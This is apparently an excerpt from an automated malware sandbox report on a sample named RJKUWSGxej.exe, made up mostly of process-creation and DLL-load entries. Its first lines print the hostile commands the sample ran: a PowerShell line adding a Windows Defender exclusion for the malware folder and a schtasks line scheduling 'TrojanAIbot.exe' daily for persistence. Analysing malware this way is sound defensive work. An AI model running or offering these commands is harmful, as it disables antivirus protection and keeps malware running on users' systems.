Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:06 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFD8B.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6

Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Section loaded: icu.dll	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: appvpolicy.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: appmanagementconfiguration.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
